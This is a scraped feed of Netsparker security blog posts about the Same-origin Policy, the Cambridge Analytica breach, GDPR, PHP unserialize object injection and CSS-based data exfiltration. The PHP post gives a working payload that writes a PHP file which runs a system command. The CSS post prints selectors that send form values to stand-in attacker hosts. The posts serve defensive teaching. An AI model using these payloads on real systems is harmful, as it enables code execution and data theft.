Quantcast
Channel: Invicti
Viewing all 1027 articles
Browse latest View live

Sven Morgenroth Explains & Demos Same-origin Policy and How to Circumvent it

$
0
0

Sven Morgenroth of Netsparker gave a technical presentation entitled ‘How to Circumvent the SOP and How to Get Hacked in the Process' during episode #550 of Paul’s Security Weekly. The presentation was about the Same-origin Policy (SOP), one of the most important security policies in web browsers, and during the presentation Sven explained:

  • The origin of SOP and how it works, during which he also noted that SOP isn't a single, standardized policy because it has developed over time.
  • Why Web developers tend to hate SOP. Hint, it makes life inconvenient for them. Developers want to bypass the SOP to let their web application from a different origin (including domains <> subdomains communication) communicate with each other without having to deal with the intrications of SOP.
  • Why SOP is a good security measure, but why it also comes with a cost. On the positive side, it is restrictive, and those restrictions can be lifted to allow web applications from different origins to communicate. The problem is allowing websites from other origins to access your data. There are different ways to achieve this, but all of them can create further problems if improperly implemented.

During the presentation Sven also ran a demo showing several exploits by which developers can circumvent the SOP:

  • JSON with Padding (a way to format JSON to include it with a script tag),
  • Cross Origin Resource Sharing (CORS),
  • Setting document.domain to the value of the main domain, and the postMessage API.

For each, Sven talked about how it works and what the dangers are. There are powerful tools to disable the SOP but they have to be used with care, as it is easy to get them wrong. The episode ended with a brief Q&A session, as Joff Thyer and Keith Hoodlet joined the show.


Facebook & Cambridge Analytica Data Breach

$
0
0

What Happened with Cambridge Analytica?

When it was revealed that a company connected to President Trump's 2016 campaign, Cambridge Analytica (CA), had been able to access data from 50 million Facebook accounts, and that Facebook had suspended their (and SCL's) accounts, you may have noticed one of three things, depending on your normal habitat:

  • Regular users probably continued accessing their highly convenient web and mobile applications, mostly unconcerned
  • The wider technology industry, much better informed, dashed off a flurry of indignant tweets (using the #deletefacebook hashtag) and blog posts about personal security and corporations' lack of adherence to the rules
  • But, the web security industry, much more used to thinking and working at scale, sat up and paid close attention

It's difficult to wrap your brain around the numbers, yet if Facebook was a country, its population statistics would lag behind only China and India. This is no small matter.

Cambridge Analytica Logo

What's the Back Story?

  • The leak of data actually happened in 2015, aeons ago in technology terms. In a recent CNN interview conducted by Laurie Segall, Zuckerberg admitted about the data breach was a mistake that Facebook neglected to inform affected users about at the time. In his CNN interview, Zuckerberg called out a developer, Aleksandr Kogan, who he accused of misusing information he had access to.
  • Cambridge Analytica's timeline records that their research partner, GSR, was reported by the Guardian in December of  2015 as having breached Facebook's terms of service and possibly the Data Protection Act. At the time, Facebook asked both GSR and Cambridge Analytica to delete the data.
  • Fast forward to March 2017, when CA ran an internal audit to ensure that all GSR data had been deleted, and then informed Facebook. Then in late 2017 and into the early part of this year, the Information Commissioner's Office (ICO) contacted CA to ask for details about how they processed data, including data on US nationals in the UK and alleged work on Brexit. CA reported that they cooperated fully, providing all requested information.
  • In March 2018, when Facebook suspended CA and SCL accounts, the full impact hit the public consciousness.

What Will Change at Facebook?

Zuckerberg revealed in the CNN interview that they had over 15,000 people working on security, though he warned security was not something that could be solved 100%. And, he was at some pains to point out that, while users can take advantage of targeted advertisements that are based on coveted demographics, Facebook does not actually sell that data – a common enough accusation levelled at many organisations with a similarly gargantuan user base.

Facebook Logo

Zuckerberg outlined the remediation activities that would now be put in place:

  • Cambridge Analytica would be investigated thoroughly, to see whether they still had access to the data
  • Developers would now have more restrictions placed on them
  • Those who developed apps for Facebook, who have access to large swathes of data, would also be investigated
  • Other suspicious activities would be examined

So far, so good – if staggeringly scant in detail, given the epic size of his security team.

For all such organisations, not just Facebook, we would like to see:

  • A copy of a new draft of the user agreement
  • The details of a few internal policies on how data is managed: some information on data capture, use, storage, sharing and destruction
  • And, ideally even a facility, in the style of the UK's Freedom of Information Act, where individuals (within certain parameters) have the legal right to have a copy of all their data, as held by public sector bodies (which, could be accessed online) – why not?

Are Blithe Consumers at Fault?

Flipping things right around, let's think like a consumer for a second. How many times a week do you willingly hand over data to someone?

  • You order your skinny latte and get asked at the end of the purchase whether you want a loyalty card. This may involve completing a form, containing at least your name, address and contact details. Think: where is this form then stored, until it is entered into a database? And, who has access to that database?
  • You download a health app to your device of choice and impatiently check the box to confirm that you've read the Terms and Conditions, which you presume includes some mention of how that organization handles your data.

The web security industry is singing from the same hymn sheet at least on this point. Consumers simply cannot have the entire weight of their own data security resting on their shoulders. It is up to application developers and vendors to ensure that what they develop, is, in the first instance, Security by Design (a concept outlined in the EU's new GDPR regulations), takes account of Personal Data, and provides regular updates.

Which Takes Precedence? Data Portability or Data Security?

Data portability is the concept that while data may be collected by one organization for one purpose, it may later be used by the same (or another) organization, for a related, or entirely different, purpose – something we rely on every day. This accepted practice is standard within law enforcement and emergency services, for example, where, in certain extreme circumstances and within defined parameters, organisations can contact the authorities to help them pinpoint and investigate someone who may have expressed violent intentions on a web forum. Yet, on the other hand, while laws abound around data use and security, individuals and organizations, can and do, flout those parameters and regulations with alacrity.

Ask any one of our Security Researchers this question, and the answer on which takes precedence is going to be: Data Security, no doubt.

Yet if we all want the freedom offered by our smartphone apps and organizations want the convenience of sharing data to offer other services to their partner's consumers, we have to be willing to understand that our data is shared – many times with permission we granted years ago and not just in emergency situations.

And, as technology companies, perhaps we need to become much more adept at recognising when an opportunity we present to partners (access to reams of personal data) might just be too good to pass up. The GDPR regulations that all organizations handling data belonging to EU citizens must adhere to, require not only that organizations identify and manage their own and customers' data securely, but that they investigate in detail how their partners, and those with whom they share data, and ensure that they comply with the same regulations. Did Facebook conduct due diligence in this case?

Further, do we, as organisations, have written policies, clear procedures and regular training for staff, contractors, developers and partners, to ensure that everyone who has access to personal and other data knows how it must be handle and follows those procedures? Do we have further procedures for discovering when this is not the case?

Data Security Goes Beyond Automated Vulnerability Scanning

As web applications increase in complexity, vendors have to consider the technical specifications, a robust and functional, yet appealing, UI and code that is free of bugs. One of those specifications often concerns user permissions – who has access to the web application and to what level. When it exposes the web application, its users and data, this can often lead to logical vulnerabilities. One of the most easily recognised types concerns access control. And, the reason that automated scanning tools are unable to detect these vulnerabilities is simply that, while logic and decision making is involved, this is more of a business decision that is made by someone familiar with practices in the the industry and organization in particular, as well as with the web application.

Next month, the EU regulations will require all organizations that handle data belonging to EU citizens adhere to fairly straightforward rules concerning who has access to the Personal Data we acquire from individuals and manage on their behalf. Organisations need to be able to answer the most simple of questions:

  • Who does this data belong to? And, who should have access to it?
  • Can we justify retaining it? And, for how long? What data retention process is in place to check that when data has served its usefulness, it is automatically placed on a disposal schedule?
  • Are we due to share it with other organizations, and do we have the owner's express permission to do so? And, can we demonstrate that those organizations in turn have similar access control, disposal and other security policies?
  • Do we know who currently has access to the data, both inside and outside our organization? If there are gaps in our security, have we put in place policies, permissions and checks to ensure that what we intended is what is actually happening?

Mark Zuckerberg announced that he was willing to testify in any U.S. government inquiry into the reported breach. He has also stated that he was not opposed to regulation of his social media company and has recognised that Facebook needed to be more publicly accountable. Many might add that such organisations should know the details of what partners and developers are doing on your behalf. In light of this latest breach, along with the infamous Equifax, Apache and Grammarly incidents, let's hope none of us are in the unenviable position of all organisations involved – realising what damage such an epic breach can do to our brand, not to state the unknown, individual consequences of the breach of all types of personal data.

Why You Should Never Pass Untrusted Data to Unserialize When Writing PHP Code

$
0
0

In PHP, as in every other programming language you use for web development, developers should avoid writing code that passes user-controlled input to dangerous functions. This is one of the basics of secure programming. Whenever a function has the capability to execute a dangerous action, it should either not receive user input, or the user-controlled data should be sanitized in order to prevent a malicious user from breaking the intended functionality.

In most scenarios, it's obvious why a given function argument should not be able to be controlled by the user. Many programming guides will supply a list of relevant functions. This table lists a few examples for PHP (incomplete).

FunctionReasons to be Careful

system
exec
passthru
shell_exec
backticks

These functions allow you to execute system commands. They, therefore, should not accept user-controlled input in arguments.

include
require
include_once
require_once

Using one of these functions on user-controlled input can lead to local or remote file inclusions.

unserializeThis function is very often left unexplained!

Unserialize is a function that is generally used to convert a class into a string that can be stored and used later, so that it can be passed to other functions, or cached in case it's going to be needed often. Almost every guide on developing secure PHP applications contains the unserialize function, but few explain why you should never use it on user-supplied input.

The reality is that exposing this function can have serious consequences. In fact using user-controlled input in unserialize is so dangerous that even the developers of PHP stopped treating exploitable bugs in the C code that powers unserialize as security vulnerabilities (see Unserialize security policy).

This sounds a little confusing at first, but if you examine the PHP documentation, you will see that it suggests that you never use unserialize on user-supplied input. This is a very clear warning. The PHP language developers assume that you would never expose this function to an attacker. This means that even if someone discovers an exploitable buffer overflow in PHP (that's caused by unserialize), it will not be considered a security vulnerability by the PHP developers – because unserialize was never designed to be used in this way in the first place!

💡 It's worth pointing out that some other, popular PHP web applications, Joomla, WordPress and Piwik, have also suffered from PHP object injections.

PHP Classes Crash Course

To understand the problem with unserialize, you first have to have a basic understanding of PHP classes. I created the class below and will explain to you how it works.

  • In line 3, I created a name for the class, Logging.
  • In lines 5-7 I defined different properties (or variables) for the class. As you can see, I used the public, protected and private keywords. Their purpose is easily explained.

Properties

If I created a subclass from my Logging class, it would inherit all the public and protected properties. This means if I created a subclass named LoggingSubclass, I could access all the protected and public properties, while the private ones would be accessible only by the class that created them.

Even though both the public and protected properties can be inherited, there is a small difference between the two. You can get, and set, a public property as illustrated.

However, a protected property is only meant for internal use within the class and can't be accessed directly. From my description, you have probably noticed that I didn't use the keywords correctly in the example above. It would be enough to set them all to protected, as we don't need to access them. The reason I wanted to include all the keywords will become obvious later when we examine the serialize function.

Magic Methods

You can see that I have defined the __construct method (or function). This is sometimes referred to as a 'magic method'. Magic methods are named after the specific action that leads to their execution. They're easily recognized by their two leading underscores.

For example __construct will be called as soon as we create a new instance of the class. This is done using the 'new' keyword displayed in the code above. We can pass arguments to the __construct method by writing them in parentheses after the class name: new Test('value'). If we create a new instance of a class, all its methods and properties are returned in an object we can easily access.

Later in the code, there is the method createLog, that creates a new log file if it doesn't yet exist, and then the logAction function writes a new log entry into the file. However, there is one method in the Logging class that we've not yet mentioned: __wakeup. You can tell that it's a magic method like __construct from its initial two underscore characters. However, instead of being called after a new instance of a class is created, __wakeup will be called as soon as a serialized object of the class is deserialized.

What is (De)serialization?

serialize()

Simply put, when you serialize an object, you create a string representation of it. To do this, you use the serialize function as illustrated. Since it may contain null-bytes that are not visible, I used the str_replace function to make them visible.

As you see, we have created a new instance of the Logging class, and chose 'Alice' as the username. We also made a test entry that should already be logged. If we look at the code, this should change the log_file property to something like 'logs/Alice_07-09-17.log' and the last_log property to 'making a test entry'.

Let's take a look at the serialized output:

O:7:"Logging":5:{s:8:"last_log";s:19:"making a test entry";s:9:"last_time";i:1504796057;s:11:"\x00*\x00log_date";s:8:"07-09-17";s:11:"\x00*\x00username";s:5:"Alice";s:17:"\x00Logging\x00log_file";s:23:"logs/Alice_07-09-17.log";}

This table explains what's going on in the code.

CodeAction
O:7:"Logging":5:{ ... }

This is an object of our Logging class. Objects always begin with an uppercase 'O' in serialized strings.

After a colon there is the number of characters in the class name, in this case '7'.

After another colon, there is the actual class name in double quotes, followed by the number of properties ('5').

The properties are then listed within the curly brackets.

s:8:"last_log";s:19:"making a test entry";

This is a public property. The property name is a string, indicated by a lowercase 's', followed by the number of characters. In this case it's '8', because last_log has eight characters.

After the semicolon there is the property value with the same syntax.

s:11:"\x00*\x00log_date";s:8:"07-09-17";This follows the same logic as above, but this time we have a protected property. Serialize indicates that the property is protected by putting '\x00*\x00' in front of the property name.
s:17:"\x00Logging\x00log_file";s:23:"logs/Alice_07-09-17.log";This is what a private property looks like. Instead of the asterisk character, Serialize puts the filename between the two null-bytes. Keep in mind, that instead of '\x00', serialize uses an actual null-byte. You should remember this when you read the output of Serialize, as they are non-printable characters.


unserialize()

By using unserialize, we achieve exactly the opposite. Instead of turning an object into a string, we do it the other way around. We pass a string produced by serialize to the unserialize function, and turn it into an object. This will essentially use the object name and search for a corresponding class name. In our case, O:7:Logging:[...] would result in PHP searching for a class with the name 'Logging'. If it found one, it would then use all the properties from the serialized string and add them to the object.

Once this is done, the object is in the same state as it was before it was serialized. Therefore you can, for example, take the logging class, serialize it, and put the resulting string into a database and then deserialize it again when it's needed.

Introducing PHP Object Injection

Let's summarize what we've discussed so far:

  • When we deserialize a serialized object the __wakeup method is called automatically
  • We can control any of the property values
  • We can control what class we want to create an object for
  • All we need in order to achieve what we want is user-controllable input in unserialize

Now let's imagine we have the following code:

As you can clearly see, there is an unserialize call that takes user input as its parameter. Let's assume the file with our Logging class from above is already included. Is there a way we can gain code execution?

First let's take a look at the magic method again.

There are two properties in there: log_file and last_log. With createLog we can create a file with the path in the log_file property, and with logAction we can write arbitrary data into it. To gain code execution, an attacker's goal would be to create a file with a .php extension and then write some PHP code into it. That means we need to pass a string to unserialize that contains a path to a file in the web root. From the code, we know that the /log directory should be writeable. So, we need to add malicious PHP code. For a proof of concept we can execute a system command, for example system('dir /b'), on a Windows host. This would reveal all the files in the current directory.

Building an Exploit

Let's start with O:7:"Logging":2:{}, since we want the logging class.

Then we need to specify a file path. Let's choose s:17:"\x00Logging\x00log_file";s:12:"logs/poc.php";. As you can see, log_file is a private function, which is why we need to add \x00Logging\x00 in front of it.

Now we also need to add the php code that we want to execute. This code must be inside the last_log property. So we need to add s:8:"last_log";s:26:"<?php system('dir /b'); ?>";.

The finished string we have to pass in the GET variable data is this:

O:7:"Logging":2:{s:17:"%00Logging%00log_file";s:12:"logs/poc.php";s:8:"last_log";s:26:"<?php system('dir /b'); ?>";}

After this, we can look at logs/poc.php to see if our exploit attempt was successful.

As you can see, the poc.php file was created and the PHP was parsed. The dir /b command executed successfully, and you can see that within the logs directory there are entries from 'Alice' and 'user'. Instead of this relatively harmless payload, an attacker could choose one that gives him a reverse shell which would help him to completely take over the server.

💡 Did you know? PHP Object Injection was thought to be harmless due to a lack of useful __wakeup magic methods. However, in 2009, Stefan Esser explained in his talk Shocking News in PHP Exploitation that with PHP5's __destruct and __autoloading functions, Object Injection had became a dangerous possibility in mainstream applications and frameworks.

Class Autoloading in PHP

We were lucky that the 'Logging' class was included in the page. But what happens when the class is in another file that we don't have access to? If we are lucky, there is an autoloading feature on the page. Whenever a class is called – or an object is deserialized – PHP searches for the class. If it is not found, it will simply throw an error. However, when a function like the following is defined somewhere, PHP will pass the class name to it and then attempt to load the class again. It is only if that attempt also fails that it throws an error.

As you see, this can also lead to an LFI, by deserializing a class name with the name of a PHP file on the server. While this does not seem useful at first, due to the forced .php extension, it can attackers access to functions that are otherwise inaccessible.

Defining Exactly Why the Unserialize Function is Dangerous

The impact of using user-controlled input, together with the unserialize function, strongly depends on the available magic methods and the code inside them. Aside from __wakeup, there are other magic methods that can be abused, for example, __toString. They don't need to be easily accessible, but could be abused using the autoload functionality and external libraries in your project.

Finally, even if you don't have any exploitable methods, there can still be exploitable bugs in the underlying C code in PHP, which can be abused using unserialize. But, they are not considered to be security issues and are therefore given a lower priority by the PHP developers.

It is at this point that we can populate our Functions table from above with the appropriate content.

FunctionReasons to be (Super) Careful
unserialize

This function can be abused by attackers to gain remote code execution, local file inclusion and a wide range of other vulnerabilities, depending on the code within available magic methods. Attackers can abuse this by deserializing their own malicious PHP objects.

Our conclusion and recommendation is that you should never use unserialize on user input.

Introducing the Same-origin Policy Whitepaper

$
0
0

Same-origin Policy (SOP) is a set of restrictions originally implemented by Netscape developers to help securely manage the relationships and connections between web resources such as HTML documents and other content, APIs and cookies. It enabled each resource to be defined by a string containing the protocol, URL and port used to locate it. Resources with the same origin would be able to access each other's contents.

SOP is used to counter hacks that have the same effect as one of the most prevalent web application vulnerabilities, cross-site scripting. Browers simply prevent users accessing and altering content that does not meet the same-origin rules (even though they enable web technologies that send and receive requests across various origins, they still provide a high level of security).

We have just published The Definitive Guide to Same-origin Policy. It discusses the following key topics:

  • What would the development world look like, and how secure would it be, without the Same-origin Policy?
  • A definition of Same-origin Policy, including common misconceptions
  • How Same-origin Policy is implemented for different types of content, with some warnings concerning DOM Access and Web 2.0
  • Cross-Origin Resources Sharing (CORS) in relation to simple and preflight requests, and cookies
  • SOP for rich web applications

Finally, it ends with a concluding section on Next Generation Same-origin Policy looking beyond the loosely-defined concepts of Web 2.0 to the modern day context of HTML5 and Cross Domain Messaging.

This whitepaper has been jointly authored by Alex Baker, together with Ziyahan Albeniz and Emre Iyidogan, two of Netsparker's own Security Researchers.

Netsparker Surveys US Based C-Levels on GDPR Compliance

$
0
0

On May 25, 2018, all businesses that handle the Personal Data of EU-based citizens are required to be GDPR compliant. Otherwise they they risk a fine of up to $20 million or 4% of their annual revenue, whichever is higher.

Since the EU's population is over half a billion, the majority of businesses deal with EU citizens, either as their customers, employees or business partners. Considering the importance of the General Data Protections Regulations for businesses, we surveyed 302 Chief Executives of US businesses to gain insight into how non-EU businesses are addressing GDPR – what they are doing to adhere to these regulations, how much effort is needed and how much it is costing them.

Table of Content

  1. Who Answered the GDPR Survey?
  2. Are Businesses Ready for GDPR?
  3. Are Employees Aware of GDPR?
  4. Are Businesses Receptive to GDPR?
  5. Are Business Well Equipped to Achieve GDPR Compliance?
  6. What Changes Are Businesses Making in Order to Become GDPR Compliant?
    1. How Many People Do Businesses Have to Recruit Because of GDPR?
  7. How Much Are Businesses Spending on GDPR Compliance?
  8. What Impact Will GDPR Have?
    1. GDPR Means More Secure Web Applications
    2. Does GDPR Mean Better Handling of Personal Data and Response to Data Breaches?
    3. Consumers Reactions to Data Breaches
  9. Is GDPR a Step in the Right Secure Direction?
    1. Is Your Business GDPR Ready?

Who Answered the GDPR Survey?

The respondents all hold C-Level positions. The majority are CEOs, followed by CSOs, CISOs and CIOs.

 Who Answered the GDPR Survey?

Are Businesses Ready for GDPR?

Only 1% of those surveyed have not yet done anything to become compliant. The majority of businesses are already working on becoming GDPR compliant, and the majority of them (48.7%) have completed more than 75% of the required work.

Are Businesses Ready for GDPR?

What's even better is that 71.2% of respondents believe they will be GDPR compliant before the deadline kicks in (May 25, 2018), while 26.5% think they are on the right track and should be ready by the deadline. Only 2.3% are unlikely to be ready on time.

Respondents GDPR compliant before the deadline

Are Employees Aware of GDPR?

GDPR received a lot of media coverage – much more than PCI DSS, HIPAA, ISOs and other regulatory or compliance measures and bodies. Both the news outlets and vendors are giving it lots of attention. Could it be that the general population is becoming more concerned about privacy, and so businesses are attempting to address this additional customer demand. Or, is such coverage the natural consequence of the alarmingly hefty fines that follow if businesses fail to comply? It's not surprising then, to discover that an impressive 90% of the employees who work with the respondents are also aware of GDPR.

Are Employees Aware of GDPR?

Are Businesses Receptive to GDPR?

Compliance with government legislation is not something that businesses like. Typically, it brings with it additional expense, more complex procedures and slower production. So, it’s remarkable to see that 88.1% of our respondents said that all their business peers are receptive to GDPR, and that the majority of the employees are complying.

Keeping this receptive approach in mind, there are notable differences between industry verticals in how this is implemented. For example, respondents from the Science, Technology, Programming, Accounting, Finance and Banking sectors are 35% more likely to receive overall cooperation within the organization to achieving GDPR compliance than those in the Healthcare industry.

Are Businesses Receptive to GDPR?

Are Business Well Equipped to Achieve GDPR Compliance?

Among our results, 62.9% of respondents said that their team knows enough about GDPR and are doing everything in house, while 27.8% hired third party service firms to assist them with achieving compliance. Less than 10% said they have not found enough information – a figure I find hard to swallow, given that it seems that almost every business and news outlet in the security industry has written about GDPR. We have published the Road to GDPR Compliance Whitepaper, an easy to follow, high level guide on how businesses can become GDPR compliant.

Are Business Well Equipped to Achieve GDPR Compliance?

What Changes Are Businesses Making in Order to Become GDPR Compliant?

Compliance means more work, stricter controls and more complex procedures. So working towards compliance means at least changes to some systems, but for many businesses could also mean recruiting new people. Let’s see what changes businesses are going through in order to achieve compliance.

What Changes Are Businesses Making in Order to Become GDPR Compliant?

Only 0.3% said that they do not need to make any changes, which we presume means that they were already GDPR compliant even before GDPR was announced.

How Many People Do Businesses Have to Recruit Because of GDPR?

This is where the numbers get interesting. It turns out that there is a lot of headhunting going on! A total of 55% of those businesses who have a dedicated team for compliance have recruited more than six additional employees to assist them to achieve GDPR compliance.

Currently, 82% of companies surveyed currently have a DPO on their staff, while 77% plan to hire a new, replacement DPO, prior to the GDPR target date of May 25, 2018. What’s certain is that even though we are in the digital era, where lots of work is automated, the number of people a business needs to become GDPR compliant correlates with the number of employee the business. The more employees a business has, the bigger the compliance team.

How Many People Do Businesses Have to Recruit Because of GDPR?

How Much Are Businesses Spending on GDPR Compliance?

As above with the number of employees, the bigger the business is, the more it spends on GDPR. The majority, 59.6%, will spend somewhere between $50,000 and $1 million, while 10.3% will spend more than $1 million to become GDPR compliant.

How Much Are Businesses Spending on GDPR Compliance?

What Impact Will GDPR Have?

News of data leaks, stolen credit cards, fraud and identity theft has become so frequent that the general population is very aware of the need for more secure services that guard their data and personal privacy. So what impact will GDPR have on businesses and industries that serve these savvy and demanding consumers once it comes into force?

GDPR Means More Secure Web Applications

Web applications are the centre of many modern business, government and consumer services. Online services are web applications, the cloud is a collection of web applications and businesses collect and share the majority of their data via web applications and web APIs. It is easy to conclude that GDPR should have a positive impact on the security of applications, or so the majority of respondents think. Only 2% disagree.

GDPR Means More Secure Web Applications

Does GDPR Mean Better Handling of Personal Data and Response to Data Breaches?

The last few years has witnessed many data breaches. What is even worse is watching how businesses handle data breaches: some have tried to hide them, some have announced them years later, some were unaware that their networks were hacked and data had been leaked.

So will businesses now adopt a more ethical approach? Of those asked, 54.3% believe that businesses will be even more hesitant to report data breaches because of the punitive fines. On the other hand, 53.6% believe that businesses will no longer hide data breaches. Many others are of the opinion that it won’t change anything. We shall see…

Does GDPR Mean Better Handling of Personal Data and Response to Data Breaches?

Consumers Reactions to Data Breaches

Let’s assume that businesses will disclose all data breaches. Will this increased exposure – mainly because of GDPR – have an impact on consumers? The majority think that it will drive consumers to be more assertive in asking businesses what they are doing with their data and how they are handling it.

We are already noticing this in Europe, especially in countries such Germany and the Netherlands that are very strict on consumer privacy. Will other nations follow? This consumer behaviour has a huge impact, and should be encouraged if we want to see a drastic improvement in security and privacy.

Consumers Reactions to Data Breaches

Is GDPR a Step in the Right Secure Direction?

The GDPR survey results above are very positive. Businesses are on the right track and are very receptive. Maybe it is still too early to say that data leaks and identity theft are a thing of the past, but we are certainly heading in the right direction.

Is Your Business GDPR Ready?

Do you handle any EU citizen data? If the answer is 'yes', your business needs to be GDPR compliant. We have written an easy to follow guide called The Road to GDPR Compliance, which will help you get started and ensure your business is GDPR compliant before the deadline. You can also get in touch with us to learn how Netsparker can help you with GDPR compliance.

How Private Data Can Be Stolen with a CSS Injection

$
0
0

Modern browsers do an excellent job defending web applications against reflected Cross-site Scripting (XSS). They do so by using XSS filters that allow them to reliably block such attacks in the majority of cases.

Though these filters were often bypassed in the past, modern versions constitute a huge step toward a secure web, free from one of its most prevalent vulnerabilities. The way these filters work is rather simple, yet highly effective. When your browser issues a request to a website, its inbuilt Cross-site Scripting filter checks whether:

  • Executable JavaScript is found in the request to a website, like a <script> block or an HTML element with an inline event handler
  • The same executable JavaScript is found in the response from the server
  • The JavaScript should be executed or not

In theory, this works well, but the consequence is that there is no protection from stored XSS attacks. To defend against such a common vulnerability, it's important to implement a proper Content Security Policy (CSP).

The procedure described above is closely tied to the X-XSS-Protection header. For a long time, the default header value has been '1', which translates to 'block the malicious script'. But lately, Google Chrome changed this to '1; mode=block', meaning 'prevent the whole page from loading'. This change in default behaviour comes at a time in which most browsers have caused hackers immense frustration by drastically reducing the opportunity for exploiting a reflected XSS vulnerability.

Hackers Are Determined to Find Ways Around All Types of Web Security

A dangerous, if admirable, characteristic of most hackers is that they don't accept defeat. Some are even pleased when they encounter a Web Application Firewall (WAF). The restrictions they then need to bypass are what makes them so fascinating to attackers.

Attackers are forced to get creative when encountering a filter. And they learn more each time they succeed.

So if browsers lock the front door by blocking reflected XSS, hackers will simply investigate whether they can smash some windows instead!

Mike Gualtieri, a Cyber and Information Security expert from Pittsburgh, seems to be the kind of hacker that perfectly matches this description. But he took it one step further, as outlined in Stealing Data With CSS: Attack and Defense..

As we have already established, Google Chrome mostly attempts to prevent malicious JavaScript from running in the browser, because running scripts to steal sensitive information is exactly what many attackers try to do. But what if they don't actually need JavaScript in order to exfiltrate the data we want to read?

Stealing Your Private Data With Cascading Style Sheets

JavaScript and HTML are not the only native languages that all major web browsers support. For at least 20 years, Cascading Style Sheets (CSS) have been part of this group. It's not surprising that CSS has witnessed some major changes since its inception. What started as a way to paint a red dotted border around your div tags, became a highly functional language, enabling modern web design with features such as transitions, media queries and something that can be described as 'attribute selectors'.

Instead of focusing solely on the obvious methods – using JavaScript or HTML – Mike Gualtieri found a way to exfiltrate data using CSS without Google Chrome's XSS filter catching him in the act. The key component of the attack, which he called 'CSS Exfil', is attribute selectors.

As we've already discovered, CSS evolved over time and became increasingly complex. Did you know, for example, that you could set the color for every link that begins with 'https://netsparker.com/' on your website to green, just by using CSS? You can view how easy it is to do on JSFiddle (look, no JavaScript!).

An everyday CSS selector may look similar to this one:

a {
   color: red;
}

This will select all <a> tags and set the color of their link text to red. This doesn't allow a great degree of flexibility though, and may even interfere with the rest of your web design. It's possible that you may want to set the color of internal links to a different color than external ones, in order to make it easier for visitors to see which link will navigate away from your website. What you can do is create a class like the one below and apply it to all anchor tags that point to internal links:

.internal-link {
   color: green;
}

This is not necessarily an ideal situation; it adds more HTML code and you need to manually check that the correct class has been set for all internal links. Conveniently, CSS provides an easier solution to this problem.

Selecting CSS Attributes

CSS Attribute Selectors enable you to set the color of every link that begins with 'https://netsparker.com/' to green, for example:

a[href^="https://netsparker.com/"] {
   color: green;
}

This is a nice feature, but what does this have to with data exfiltration? Well, it's possible to issue outgoing requests by using the background directive in conjunction with url. If we combine this with an attribute selector, we can easily confirm the existence of certain data within HTML attributes on the page:

<style>
   input[name="pin"][value="1234"] {
      background: url(https://attacker.com/log?pin=1234);
   }
</style>
<input type = "password" name = "pin" value = "1234">

This CSS code will select any input tag that contains the name 'pin' and the value '1234'. By injecting the code into the page between the <style> tags, it's possible to confirm that our guess was correct. If the pin was '5678', the selector wouldn't match the input box and no request would be issued to the attacker's server. This example does not describe the most useful attack out there, but it may be used to deanonymize users.

This is another example of how such exfiltration may work. It is directly taken from Mike Gualtieri's previously mentioned work.

<html>
<head>
   <style>
       #username[value*="aa"]~#aa{background:url("https://attack.host/aa");}#username[value*="ab"]~#ab{background:url("https://attack.host/ab");}#username[value*="ac"]~#ac{background:url("https://attack.host/ac");}#username[value^="a"]~#a_{background:url("https://attack.host/a_");}#username[value$="a"]~#_a{background:url("https://attack.host/_a");}#username[value*="ba"]~#ba{background:url("https://attack.host/ba");}#username[value*="bb"]~#bb{background:url("https://attack.host/bb");}#username[value*="bc"]~#bc{background:url("https://attack.host/bc");}#username[value^="b"]~#b_{background:url("https://attack.host/b_");}#username[value$="b"]~#_b{background:url("https://attack.host/_b");}#username[value*="ca"]~#ca{background:url("https://attack.host/ca");}#username[value*="cb"]~#cb{background:url("https://attack.host/cb");}#username[value*="cc"]~#cc{background:url("https://attack.host/cc");}#username[value^="c"]~#c_{background:url("https://attack.host/c_");}#username[value$="c"]~#_c{background:url("https://attack.host/_c");}
   </style>
</head>
<body>
   <form>
       Username: <input type="text" id="username" name="username" value="<?php echo $_GET['username']; ?>" />
       <input id="form_submit" type="submit" value="submit"/>
       <a id="aa"><a id="ab"><a id="ac"><a id="a_"><a id="_a"><a id="ba"><a id="bb"><a id="bc"><a id="b_"><a id="_b"><a id="ca"><a id="cb"><a id="cc"><a id="c_"><a id="_c">
   </form>
</body>
</html>

What happens here is that there is a username inside the value field of an input box once the page loads. This seemingly cryptic piece of CSS and HTML code can actually provide the attacker with a decent amount of information.

If the username begins with 'a', a request containing 'a_' will be sent to the attacker's server. Should it end with 'b', the server will receive '_b'. If the username contains 'ab' on the page where the malicious stylesheet is embedded, the browser will issue a request containing 'ab'.

This is can become complicated. According to Mike Gualtieri's calculations, a combination of lower and uppercase characters, numeric characters and 32 symbols might result in a CSS payload that is more than 620 KB in size. It may be possible to extract the data with a smaller payload, if the casing doesn't matter, by appending the 'i' modifier to the end of the attribute selector. In this case, it's only necessary to use lowercase letters.

There are a few problems with this method, though, as it requires some prerequisites:

  • The data must be present when the page is loaded, so that it's not possible to live-capture user input using CSS Exfil.
  • There must be enough elements that can be styled using CSS. One element can't be used for two different exfiltrations. What you can do is use one element to find out the first letter and one element that you exclusively use for the last letter, since there is only one possible first and one possible last letter. However, for all other letters, this is less easy.
  • The elements you use for exfiltration must allow CSS attributes that you can use url on, such as background or list-style etc.

Also, it isn't easy to reassemble the data. For example, if you would try to exfiltrate this rather weak password of a fan of the Swedish pop band ABBA, you would run into a serious problem.

abbaabbaabba

This password begins with an 'a', ends with an 'a' and contains 'ab', 'bb', 'aa', as well as 'ba'. But that doesn't help you to reassemble the password. There is still much guesswork. You don't even know for sure how long the password is. 'abbaa' matches this description too, but it's still not the password we were looking for.

Mike Gualtieri's blog post gives us much to think about. Even something as simple as a programming language that was only meant to style documents can be abused by clever researchers in order to attack an application. If CSS continues its current development course, it will become even more useful for users – and attackers.

How Can You Prevent a CSS Injection Attack?

There are a few simple steps you can take to ensure your application is free from bugs that could allow attackers to include external style sheets of their choosing:

  1. Apply context-dependent sanitization. This means that you have to use different forms of encoding in different situations: for example, hex encoding within script blocks or HTML entities within other HTML tags. There might be situations where you need to use other forms of sanitization as well, like HTML encoding, or with the help of a white list.
  2. Scan your application with a vulnerability scanner, since the vulnerability is essentially an injection of HTML code that can be detected by most web application security scanners. Just like XSS, this attack requires an injection of code. Netsparker can easily detect the underlying vulnerability, which is similar to Cross Site Scripting.
  3. Implement a proper Content Security Policy (CSP) if you want to be absolutely sure that an attacker can't abuse this vulnerability, even if you forgot sanitization once. We recommend that you also implement a proper CSP that restricts from where images and stylesheets are allowed to be loaded. This enables you to instruct the user's browser to only load stylesheets from your own domain or trusted third parties, which would ensure such an attack would fail.

Each of these recommendations is essential to prevent the vulnerability across your entire code base.

Netsparker Will Be Exhibiting at Infosecurity Europe 2018 in London

$
0
0

